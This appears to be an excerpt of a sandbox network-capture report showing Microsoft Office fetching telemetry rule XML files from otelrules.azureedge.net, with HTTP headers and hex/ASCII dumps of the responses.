                                                                                                                                                                                                                                            2024-11-14 12:02:26 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                            Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:51 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1378
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE584C214"
                                                                                                                                                                                                                                            x-ms-request-id: 0d132678-f01e-0020-1a09-36956b000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120251Z-1749fc9bdbdlfqrwhC1DFWmyg800000000mg000000001x60
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            26192.168.2.44978313.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:27 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 2980
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                            x-ms-request-id: c44deeeb-501e-0078-1d59-3506cf000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120228Z-1749fc9bdbddrtrhhC1DFWsq8000000002p0000000000w8p
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:51 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1397
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                                                                                            x-ms-request-id: 524ac160-c01e-007a-69d2-2cb877000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120251Z-16547b76f7f4k79zhC1DFWu9y00000000khg00000000es4t
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            27192.168.2.44978613.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:27 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:27 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                            x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120227Z-16547b76f7fp6mhthC1DFWrggn0000000kqg000000007uey
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:52 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1406
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEB16F27E"
                                                                                                                                                                                                                                            x-ms-request-id: 22f3493d-c01e-00a1-6ba6-347e4a000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120252Z-r178fb8d765kzgrxhC1DFWrsuc00000002b0000000007afs
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:52 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            28192.168.2.44978413.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:27 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:27 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 3788
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                            x-ms-request-id: be525922-801e-00a0-03ff-2c2196000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120227Z-16547b76f7f2g4rlhC1DFWnx880000000kn0000000000atx
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:51 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1370
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                                                                                            x-ms-request-id: 43525779-601e-003e-2ed2-2c3248000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120251Z-16547b76f7fcrtpchC1DFW52e80000000krg000000001uut
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            29192.168.2.44978513.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:27 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 2160
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                            x-ms-request-id: d96f0357-501e-00a0-7911-369d9f000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120227Z-1749fc9bdbdhnf7rhC1DFWgd0n00000002e000000000b73c
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC192OUTGET /rules/rule702150v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:51 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 1360
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BEDC8193E"
                                                                                                                                                                                                                                            x-ms-request-id: 95e3a472-701e-0050-58d2-2c6767000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                            x-azure-ref: 20241114T120251Z-16547b76f7fvllnfhC1DFWxkg80000000kpg0000000063q3
                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            2024-11-14 12:02:51 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                            30192.168.2.44978713.107.246.45443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:02:27 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                            2024-11-14 12:02:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:02:28 GMT
                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                            Content-Length: 450
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                            ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                            x-ms-request-id: b9f0e195-301e-0033-8068-35fa9c000000
                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
